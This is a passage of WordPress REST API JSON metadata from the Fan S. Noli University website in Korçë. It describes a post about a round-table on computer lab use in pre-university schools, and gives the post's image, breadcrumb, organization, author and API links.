\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#primaryimage","url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg","contentUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.22.05-PM-3-1-1024x768.jpeg"},{"@type":"BreadcrumbList","@id":"https:\/\/unkorce.edu.al\/perdorimi-konkret-i-sallave-kompjuterike-ne-mjediset-shkollore-te-arsimit-parauniversitar-ishte-tema-e-tryezes-se-rrumbullaket-me-lektore-pedagogen-e-departamentit-te-gjuheve-te-huaja-dr-ju\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unkorce.edu.al\/"},{"@type":"ListItem","position":2,"name":"\u201cP\u00cbRDORIMI KONKRET I SALLAVE KOMPJUTERIKE N\u00cb MJEDISET SHKOLLORE T\u00cb ARSIMIT PARAUNIVERSITAR ISHTE TEMA E TRYEZ\u00cbS S\u00cb RRUMBULLAK\u00cbT ME LEKTORE PEDAGOGEN E DEPARTAMENTIT TE GJUH\u00cbVE T\u00cb HUAJA, DR. JULIANA \u00c7YFEKU"}]},{"@type":"WebSite","@id":"https:\/\/unkorce.edu.al\/#website","url":"https:\/\/unkorce.edu.al\/","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","description":"Mir&euml;sevini n&euml; faqen zyrtare!","publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unkorce.edu.al\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/unkorce.edu.al\/#organization","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","url":"https:\/\/unkorce.edu.al\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/","url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","contentUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","width":200,"height":120,"caption":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb"},"image":{"@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/unkorce"]},{"@type":"Person","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e","name":"Brikela Qelemeni","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g","caption":"Brikela Qelemeni"},"url":"https:\/\/unkorce.edu.al\/en\/author\/brikela\/"}]}},"_links":{"self":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/17649","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/comments?post=17649"}],"version-history":[{"count":1,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/17649\/revisions"}],"predecessor-version":[{"id":38000,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/17649\/revisions\/38000"}],"wp:attachment":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/media?parent=17649"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/categories?post=17649"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/tags?post=17649"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}